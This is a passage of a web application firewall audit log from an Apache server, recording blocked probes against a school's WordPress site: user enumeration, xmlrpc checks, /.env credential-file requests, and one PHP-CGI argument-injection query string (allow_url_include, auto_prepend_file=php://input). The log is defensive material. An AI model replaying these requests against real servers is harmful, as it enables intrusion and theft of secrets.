+0700] aBzBK8P9GxxPAbCroFYtIwAAAEg 103.236.140.4 50700 103.236.140.4 8181 --f775171e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f775171e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f775171e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714923666194 2039 (- - -) Stopwatch2: 1746714923666194 2039; combined=1028, p1=340, p2=661, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f775171e-Z-- --e07c903c-A-- [08/May/2025:21:35:26 +0700] aBzBLsP9GxxPAbCroFYtJQAAAFQ 103.236.140.4 50704 103.236.140.4 8181 --e07c903c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.130 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e07c903c-C-- demo.sayHello --e07c903c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e07c903c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714926411374 4307 (- - -) Stopwatch2: 1746714926411374 4307; combined=3325, p1=414, p2=2753, p3=22, p4=19, p5=69, sr=65, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e07c903c-Z-- --f6c4830f-A-- [08/May/2025:21:35:49 +0700] aBzBRY4K347NtBcwXKxhKgAAAJc 103.236.140.4 50716 103.236.140.4 8181 --f6c4830f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6c4830f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6c4830f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714949564067 3272 (- - -) Stopwatch2: 1746714949564067 3272; combined=1470, p1=493, p2=944, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6c4830f-Z-- --392ce625-A-- [08/May/2025:21:35:53 +0700] aBzBSSs5rYyn3jlLjjIWcQAAANY 103.236.140.4 50720 103.236.140.4 8181 --392ce625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --392ce625-C-- demo.sayHello --392ce625-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --392ce625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714953639969 5510 (- - -) Stopwatch2: 1746714953639969 5510; combined=4109, p1=537, p2=3309, p3=30, p4=33, p5=114, sr=90, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --392ce625-Z-- --a7fe3f3b-A-- [08/May/2025:21:36:03 +0700] aBzBU44K347NtBcwXKxhLAAAAIE 103.236.140.4 50724 103.236.140.4 8181 --a7fe3f3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a7fe3f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7fe3f3b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714963738365 2960 (- - -) Stopwatch2: 1746714963738365 2960; combined=1287, p1=441, p2=816, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7fe3f3b-Z-- --5d36fe47-A-- [08/May/2025:21:36:07 +0700] aBzBV44K347NtBcwXKxhLQAAAJM 103.236.140.4 50728 103.236.140.4 8181 --5d36fe47-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d36fe47-C-- demo.sayHello --5d36fe47-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d36fe47-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714967159185 4997 (- - -) Stopwatch2: 1746714967159185 4997; combined=3797, p1=555, p2=3031, p3=26, p4=26, p5=92, sr=142, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d36fe47-Z-- --479a1d55-A-- [08/May/2025:21:37:27 +0700] aBzBpys5rYyn3jlLjjIWcwAAAMc 103.236.140.4 50736 103.236.140.4 8181 --479a1d55-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.73 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --479a1d55-C-- --479a1d55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --479a1d55-E-- --479a1d55-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746715047729257 4785 (- - -) Stopwatch2: 1746715047729257 4785; combined=3197, p1=484, p2=2679, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --479a1d55-Z-- --d1f0406f-A-- [08/May/2025:22:02:04 +0700] aBzHbCs5rYyn3jlLjjIWggAAANc 103.236.140.4 50836 103.236.140.4 8181 --d1f0406f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d1f0406f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f0406f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746716524851760 3027 (- - -) Stopwatch2: 1746716524851760 3027; combined=1296, p1=446, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1f0406f-Z-- --8416d534-A-- [08/May/2025:22:02:09 +0700] aBzHcSs5rYyn3jlLjjIWhAAAAMM 103.236.140.4 50842 103.236.140.4 8181 --8416d534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8416d534-C-- demo.sayHello --8416d534-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8416d534-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746716529330702 4522 (- - -) Stopwatch2: 1746716529330702 4522; combined=3527, p1=431, p2=2900, p3=22, p4=24, p5=89, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8416d534-Z-- --74e9677f-A-- [08/May/2025:22:08:55 +0700] aBzJBys5rYyn3jlLjjIWhwAAAMs 103.236.140.4 50884 103.236.140.4 8181 --74e9677f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 58.187.141.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 58.187.141.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --74e9677f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74e9677f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746716935366816 2517 (- - -) Stopwatch2: 1746716935366816 2517; combined=1228, p1=403, p2=794, p3=0, p4=0, p5=31, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e9677f-Z-- --c906054a-A-- [08/May/2025:22:13:39 +0700] aBzKI6cs1DvJ_HgMHE9hUAAAABg 103.236.140.4 50928 103.236.140.4 8181 --c906054a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 64.227.70.2 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c906054a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c906054a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746717219412070 805 (- - -) Stopwatch2: 1746717219412070 805; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c906054a-Z-- --3160881e-A-- [08/May/2025:22:33:05 +0700] aBzOscP9GxxPAbCroFYucgAAAEc 103.236.140.4 55630 103.236.140.4 8181 --3160881e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 64.225.75.246 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 64.225.75.246 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3160881e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3160881e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746718385561676 1171 (- - -) Stopwatch2: 1746718385561676 1171; combined=383, p1=338, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3160881e-Z-- --62466f78-A-- [08/May/2025:22:39:25 +0700] aBzQLacs1DvJ_HgMHE9j0QAAAAA 103.236.140.4 60570 103.236.140.4 8181 --62466f78-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.146.125 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.146.125 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62466f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62466f78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746718765316010 2697 (- - -) Stopwatch2: 1746718765316010 2697; combined=1422, p1=519, p2=865, p3=0, p4=0, p5=38, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62466f78-Z-- --3cee434f-A-- [08/May/2025:22:44:17 +0700] aBzRUcP9GxxPAbCroFYwrAAAAEU 103.236.140.4 36110 103.236.140.4 8181 --3cee434f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.152.107.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.152.107.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cee434f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cee434f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746719057098587 4037 (- - -) Stopwatch2: 1746719057098587 4037; combined=2068, p1=611, p2=1418, p3=0, p4=0, p5=39, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cee434f-Z-- --6bed3440-A-- [08/May/2025:22:45:38 +0700] aBzRoqcs1DvJ_HgMHE9lDQAAABI 103.236.140.4 37164 103.236.140.4 8181 --6bed3440-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 Accept-Charset: utf-8 --6bed3440-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6bed3440-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746719138405129 812 (- - -) Stopwatch2: 1746719138405129 812; combined=350, p1=303, p2=0, p3=0, p4=0, p5=47, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6bed3440-Z-- --362b6a30-A-- [08/May/2025:23:29:07 +0700] aBzb06cs1DvJ_HgMHE9umgAAAAU 103.236.140.4 41312 103.236.140.4 8181 --362b6a30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --362b6a30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --362b6a30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746721747952670 3135 (- - -) Stopwatch2: 1746721747952670 3135; combined=1407, p1=441, p2=931, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --362b6a30-Z-- --135c4929-A-- [08/May/2025:23:29:10 +0700] aBzb1qcs1DvJ_HgMHE9unwAAAAg 103.236.140.4 41348 103.236.140.4 8181 --135c4929-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --135c4929-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --135c4929-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746721750262184 2610 (- - -) Stopwatch2: 1746721750262184 2610; combined=1336, p1=440, p2=862, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --135c4929-Z-- --d4bf0f27-A-- [08/May/2025:23:29:12 +0700] aBzb2Kcs1DvJ_HgMHE9upwAAABI 103.236.140.4 41380 103.236.140.4 8181 --d4bf0f27-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.224 X-Forwarded-Proto: http Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d4bf0f27-C-- demo.sayHello --d4bf0f27-F-- HTTP/1.1 301 Moved Permanently Location: 